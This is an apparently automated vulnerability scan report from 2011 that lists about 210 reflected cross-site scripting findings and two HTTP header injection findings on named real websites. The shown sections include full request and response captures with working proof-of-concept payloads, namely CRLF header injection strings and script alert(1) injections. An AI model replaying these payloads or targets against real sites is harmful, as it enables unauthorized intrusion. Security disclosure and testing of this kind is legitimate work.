XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 08032011-01

Report generated by XSS.CX at Mon Aug 08 06:40:48 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. HTTP header injection

1.1. http://d.adroll.com/pixel/CIF4HHWJRFFZXJ6A7DZHTI/2PEGT3UB35E6RMJYTASSQH [REST URL parameter 2]

1.2. http://d.adroll.com/pixel/CIF4HHWJRFFZXJ6A7DZHTI/2PEGT3UB35E6RMJYTASSQH [REST URL parameter 3]

2. Cross-site scripting (reflected)

2.1. https://acc.newsguy.com/cgi-bin/sub_form [adult_access parameter]

2.2. https://acc.newsguy.com/cgi-bin/sub_form [iaccess parameter]

2.3. https://acc.newsguy.com/cgi-bin/sub_form [product parameter]

2.4. https://acc.newsguy.com/cgi-bin/sub_form [refer parameter]

2.5. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [&PID parameter]

2.6. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [&PID parameter]

2.7. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [AN parameter]

2.8. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [AN parameter]

2.9. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [ASID parameter]

2.10. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [ASID parameter]

2.11. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [PG parameter]

2.12. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [PG parameter]

2.13. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [TargetID parameter]

2.14. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [TargetID parameter]

2.15. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [UIT parameter]

2.16. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [UIT parameter]

2.17. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [destination parameter]

2.18. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [destination parameter]

2.19. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [sz parameter]

2.20. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [sz parameter]

2.21. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [&PID parameter]

2.22. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [&PID parameter]

2.23. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [AN parameter]

2.24. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [AN parameter]

2.25. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [ASID parameter]

2.26. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [ASID parameter]

2.27. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [PG parameter]

2.28. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [PG parameter]

2.29. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [TargetID parameter]

2.30. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [TargetID parameter]

2.31. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [UIT parameter]

2.32. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [UIT parameter]

2.33. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [destination parameter]

2.34. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [destination parameter]

2.35. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [sz parameter]

2.36. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [sz parameter]

2.37. http://ad.accelerator-media.com/st [name of an arbitrarily supplied request parameter]

2.38. http://ad.accelerator-media.com/st [name of an arbitrarily supplied request parameter]

2.39. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.17 [sz parameter]

2.40. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.62 [name of an arbitrarily supplied request parameter]

2.41. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.62 [sz parameter]

2.42. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.66 [name of an arbitrarily supplied request parameter]

2.43. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [name of an arbitrarily supplied request parameter]

2.44. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [name of an arbitrarily supplied request parameter]

2.45. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [sz parameter]

2.46. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.19 [sz parameter]

2.47. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.24 [name of an arbitrarily supplied request parameter]

2.48. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.24 [name of an arbitrarily supplied request parameter]

2.49. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.24 [sz parameter]

2.50. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.50 [name of an arbitrarily supplied request parameter]

2.51. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.50 [name of an arbitrarily supplied request parameter]

2.52. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.50 [sz parameter]

2.53. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [name of an arbitrarily supplied request parameter]

2.54. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [name of an arbitrarily supplied request parameter]

2.55. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [sz parameter]

2.56. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [sz parameter]

2.57. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]

2.58. http://advertising.aol.com/privacy/advertisingcom/opt-out [REST URL parameter 1]

2.59. http://advertising.aol.com/privacy/advertisingcom/opt-out [REST URL parameter 2]

2.60. http://advertising.aol.com/privacy/advertisingcom/opt-out [REST URL parameter 3]

2.61. http://advertising.aol.com/privacy/advertisingcom/opt-out [name of an arbitrarily supplied request parameter]

2.62. http://altfarm.mediaplex.com/ad/fm/12741-112746-27909-3 [mpt parameter]

2.63. http://altfarm.mediaplex.com/ad/fm/12741-112746-27909-3 [mpvc parameter]

2.64. http://altfarm.mediaplex.com/ad/fm/12741-112746-27909-3 [name of an arbitrarily supplied request parameter]

2.65. http://api.bing.com/qsonhs.aspx [q parameter]

2.66. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.67. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.68. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.69. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.70. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.71. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.72. http://b3-uk.mookie1.com/2/B3/DM/2010/1@x13 [REST URL parameter 2]

2.73. http://b3-uk.mookie1.com/2/B3/DM/2010/1@x13 [REST URL parameter 3]

2.74. http://b3-uk.mookie1.com/2/B3/DM/2010/1@x13 [REST URL parameter 4]

2.75. http://b3-uk.mookie1.com/2/B3/DM/2010/1@x13 [REST URL parameter 5]

2.76. http://b3-uk.mookie1.com/2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60 [REST URL parameter 2]

2.77. http://b3-uk.mookie1.com/2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60 [REST URL parameter 3]

2.78. http://b3-uk.mookie1.com/2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60 [REST URL parameter 4]

2.79. http://b3-uk.mookie1.com/2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60 [REST URL parameter 5]

2.80. http://b3-uk.mookie1.com/2/www.three.co.uk/CHS/Weeklywrap/0511/1[TIMESTAMP]@x60 [REST URL parameter 6]

2.81. http://blog.bolsademulher.com/favicon.ico [REST URL parameter 1]

2.82. http://blog.bolsademulher.com/movimentorosa/ [REST URL parameter 1]

2.83. http://camarimmsn.com.br/wp-content/plugins/gd-star-rating/css/gdsr.css.php [s parameter]

2.84. http://camarimmsn.com.br/wp-content/themes/msn-theme/sendMail.php [http://camarimmsn.com.br/index.php/destaques/look-da-semana-de-a-volta-por-cima-2/ parameter]

2.85. http://camarimmsn.com.br/wp-content/themes/msn-theme/sendMail.php [name of an arbitrarily supplied request parameter]

2.86. http://cgi1.ebay.com/ebaymotors/ws/eBayISAPI.dll [cb parameter]

2.87. http://de17a.com/a/41565.iframe [c?url parameter]

2.88. http://de17a.com/a/41565.iframe [c?url parameter]

2.89. http://de17a.com/a/41565.iframe [c?url parameter]

2.90. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]

2.91. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]

2.92. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]

2.93. http://display.digitalriver.com/ [aid parameter]

2.94. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

2.95. http://display.digitalriver.com/ [tax parameter]

2.96. http://dri1.img.digitalrivercontent.net/store [CategoryID parameter]

2.97. http://dri1.img.digitalrivercontent.net/store [output parameter]

2.98. http://edpn.ebay.com/engagement [INIT parameter]

2.99. http://edpn.ebay.com/engagement [flashINIT parameter]

2.100. http://frontend-loadbalancer.meteorsolutions.com/api/track [jsonp parameter]

2.101. https://home.personalcapital.com/api/credential/authenticatePhone [challengeReason parameter]

2.102. https://home.personalcapital.com/api/login/identifyUser [username parameter]

2.103. https://home.personalcapital.com/api/registration/registerUser [email parameter]

2.104. https://home.personalcapital.com/api/registration/registerUser [passwd parameter]

2.105. https://home.personalcapital.com/api/registration/registerUser [termsVersion parameter]

2.106. https://home.personalcapital.com/examples/jsp/cal/cal2.jsp [time parameter]

2.107. https://home.personalcapital.com/examples/jsp/cal/cal2.jsp [time parameter]

2.108. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

2.109. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

2.110. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

2.111. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

2.112. http://image.providesupport.com/cmd/vpntunnelservice [REST URL parameter 1]

2.113. http://image.providesupport.com/js/vpntunnelservice/safe-monitor.js [REST URL parameter 1]

2.114. http://image.providesupport.com/js/vpntunnelservice/safe-monitor.js [REST URL parameter 2]

2.115. http://images.eastbay.com/is/image//EB/05712487 [id parameter]

2.116. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]

2.117. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]

2.118. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]

2.119. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]

2.120. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpck parameter]

2.121. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpck parameter]

2.122. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpck parameter]

2.123. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpvc parameter]

2.124. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpvc parameter]

2.125. http://img.mediaplex.com/content/0/17243/BC_Week_2_July_BT_300x250_G2_v4.html [mpvc parameter]

2.126. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [imp_rvr_id parameter]

2.127. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [imp_rvr_id parameter]

2.128. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpck parameter]

2.129. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpvc parameter]

2.130. http://img.mediaplex.com/content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js [imp_rvr_id parameter]

2.131. http://img.mediaplex.com/content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js [imp_rvr_id parameter]

2.132. http://img.mediaplex.com/content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js [mpck parameter]

2.133. http://img.mediaplex.com/content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js [mpvc parameter]

2.134. http://it.toolbox.com/people/ [name of an arbitrarily supplied request parameter]

2.135. http://it.toolbox.com/people/typewriter/ [REST URL parameter 2]

2.136. http://it.toolbox.com/people/typewriter/ [name of an arbitrarily supplied request parameter]

2.137. http://jlinks.industrybrains.com/jsct [ct parameter]

2.138. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

2.139. http://mfa.unilever.predicta.net/mrm-ad/ad/script/ [;c parameter]

2.140. http://mfa.unilever.predicta.net/mrm-ad/ad/script/ [name of an arbitrarily supplied request parameter]

2.141. http://o.lomadee.com/loc/locWrite.html [callback parameter]

2.142. http://sales.liveperson.net/hc/10502888/ [msessionkey parameter]

2.143. http://sales.liveperson.net/hc/72961245/ [msessionkey parameter]

2.144. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

2.145. http://servedby.flashtalking.com/imp/1/16780 [173663;201;js;MSN;300x250Retargeting/?click parameter]

2.146. http://servedby.flashtalking.com/imp/1/16780 [cachebuster parameter]

2.147. http://servedby.flashtalking.com/imp/1/16780 [ftadz parameter]

2.148. http://servedby.flashtalking.com/imp/1/16780 [ftscw parameter]

2.149. http://servedby.flashtalking.com/imp/1/16780 [ftx parameter]

2.150. http://servedby.flashtalking.com/imp/1/16780 [fty parameter]

2.151. http://servedby.flashtalking.com/imp/1/16780 [name of an arbitrarily supplied request parameter]

2.152. http://servedby.flashtalking.com/imp/14565 [89704;201;js;MMN;300x250RON/?click parameter]

2.153. http://servedby.flashtalking.com/imp/14565 [cachebuster parameter]

2.154. http://servedby.flashtalking.com/imp/14565 [ftadz parameter]

2.155. http://servedby.flashtalking.com/imp/14565 [ftscw parameter]

2.156. http://servedby.flashtalking.com/imp/14565 [ftx parameter]

2.157. http://servedby.flashtalking.com/imp/14565 [fty parameter]

2.158. http://servedby.flashtalking.com/imp/14565 [name of an arbitrarily supplied request parameter]

2.159. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]

2.160. http://v5.ux-pt-br.opt.video.msn.com/OptimizeVc.aspx [callbackName parameter]

2.161. http://wscdn.bbc.co.uk/worldservice/js/site_catalyst/s_code_bbcws.js [REST URL parameter 2]

2.162. http://wscdn.bbc.co.uk/worldservice/js/site_catalyst/s_code_bbcws.js [REST URL parameter 3]

2.163. http://wscdn.bbc.co.uk/worldservice/js/site_catalyst/s_code_bbcws.js [REST URL parameter 4]

2.164. http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null [REST URL parameter 4]

2.165. http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null [REST URL parameter 4]

2.166. http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null [REST URL parameter 4]

2.167. http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null [REST URL parameter 4]

2.168. http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp [645868;97831;0;%5btimestamp%5d;M;systemtarget parameter]

2.169. http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp [645868;97831;0;[timestamp];M;systemtarget parameter]

2.170. http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp [645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget parameter]

2.171. http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp [name of an arbitrarily supplied request parameter]

2.172. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [673819;97831;6525761750539601382;109706383;M;systemtarget parameter]

2.173. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [673819;97831;6525761750539601382;247433133;M;systemtarget parameter]

2.174. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [673819;97831;6525761750539601382;392249101;M;systemtarget parameter]

2.175. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [673819;97831;6525761750539601382;517804283;M;systemtarget parameter]

2.176. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [673819;97831;6525761750539601382;877134046;M;systemtarget parameter]

2.177. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [name of an arbitrarily supplied request parameter]

2.178. http://www.meetic-partners.com/a/diff/58/712921/show27.asp [712921;97831;6525761750539601382;512842640;M;systemtarget parameter]

2.179. http://www.meetic-partners.com/a/diff/58/712921/show27.asp [name of an arbitrarily supplied request parameter]

2.180. http://www.meetic-partners.com/call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no [REST URL parameter 7]

2.181. http://www.meetic-partners.com/call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no [[countgo] parameter]

2.182. http://www.meetic-partners.com/call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no [name of an arbitrarily supplied request parameter]

2.183. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no [REST URL parameter 3]

2.184. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no [REST URL parameter 7]

2.185. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no [http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter]

2.186. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/247433133/no [name of an arbitrarily supplied request parameter]

2.187. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no [REST URL parameter 3]

2.188. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no [REST URL parameter 7]

2.189. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no [http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter]

2.190. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/392249101/no [name of an arbitrarily supplied request parameter]

2.191. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no [REST URL parameter 3]

2.192. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no [REST URL parameter 7]

2.193. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no [http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter]

2.194. http://www.meetic-partners.com/call/adj/97831/673819/MSN_uk.meeticcorp/300x250/877134046/no [name of an arbitrarily supplied request parameter]

2.195. http://www.meetic-partners.com/diff/58/645868/show23.asp [645868;97831;0;%5btimestamp%5d;M;systemtarget parameter]

2.196. http://www.meetic-partners.com/diff/58/645868/show23.asp [645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget parameter]

2.197. http://www.meetic-partners.com/diff/58/645868/show23.asp [name of an arbitrarily supplied request parameter]

2.198. http://www.pageshoppe.me/register.php [pid parameter]

2.199. http://www.web.com/resources/customersuccessstories.aspx [_TSM_HiddenField_ parameter]

2.200. http://m.adnxs.com/tt [Referer HTTP header]

2.201. http://www.russellgrant.com/ [Referer HTTP header]

2.202. http://adomas.org/javascript-mouse-wheel/ [REST URL parameter 1]

2.203. http://adomas.org/javascript-mouse-wheel/ [REST URL parameter 1]

2.204. http://adomas.org/javascript-mouse-wheel/ [name of an arbitrarily supplied request parameter]

2.205. http://adomas.org/javascript-mouse-wheel/ [name of an arbitrarily supplied request parameter]

2.206. http://go.personalcapital.com/iFrameEmailCapture.html [_mkto_trk cookie]

2.207. http://image.providesupport.com/js/vpntunnelservice/safe-monitor.js [vsid cookie]

2.208. http://msn.bolsademulher.com/mundomelhor/ecologia-para-vestir-107388.html [bdm_unique cookie]

2.209. http://msn.estatico2.bolsademulher.com/img/generic/hover-menu.png [bdm_unique cookie]

2.210. http://o.lomadee.com/loc/locWrite.html [lmdinfo cookie]



1. HTTP header injection  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://d.adroll.com/pixel/CIF4HHWJRFFZXJ6A7DZHTI/2PEGT3UB35E6RMJYTASSQH [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/CIF4HHWJRFFZXJ6A7DZHTI/2PEGT3UB35E6RMJYTASSQH

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b0624%0d%0ab55b04ac9a8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/b0624%0d%0ab55b04ac9a8/2PEGT3UB35E6RMJYTASSQH?pv=709723867.4759865&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.snapengage.com/plans
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 02 Aug 2011 11:22:39 GMT
Connection: keep-alive
Set-Cookie: __adroll=4d9ea333e1878cefa789df91cebf503e; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/b0624
b55b04ac9a8
/2PEGT3UB35E6RMJYTASSQH/FWOQF77OPZHKJHKC2K6BJZ.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


1.2. http://d.adroll.com/pixel/CIF4HHWJRFFZXJ6A7DZHTI/2PEGT3UB35E6RMJYTASSQH [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/CIF4HHWJRFFZXJ6A7DZHTI/2PEGT3UB35E6RMJYTASSQH

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5abc0%0d%0ae08b623f322 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/CIF4HHWJRFFZXJ6A7DZHTI/5abc0%0d%0ae08b623f322?pv=709723867.4759865&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.snapengage.com/plans
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 02 Aug 2011 11:22:40 GMT
Connection: keep-alive
Set-Cookie: __adroll=4d9ea333e1878cefa789df91cebf503e; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/CIF4HHWJRFFZXJ6A7DZHTI/5abc0
e08b623f322
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2. Cross-site scripting (reflected)  previous
There are 210 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. https://acc.newsguy.com/cgi-bin/sub_form [adult_access parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_form

Issue detail

The value of the adult_access request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54739"><script>alert(1)</script>f5ece6155aa was submitted in the adult_access parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /cgi-bin/sub_form?1 HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/cgi-bin/sub_form
Content-Length: 70
Cache-Control: max-age=0
Origin: https://acc.newsguy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

product=11117&adult_access=yes54739"><script>alert(1)</script>f5ece6155aa&iaccess=f&refer=&submit.x=23&submit.y=5

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 11:23:21 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 28270


<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...
<input type="hidden" name="adult_access" value="yes54739"><script>alert(1)</script>f5ece6155aa">
...[SNIP]...

2.2. https://acc.newsguy.com/cgi-bin/sub_form [iaccess parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /cgi-bin/sub_form

Issue detail

The value of the iaccess request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb47"><script>alert(1)</script>89203b485c9 was submitted in the iaccess parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

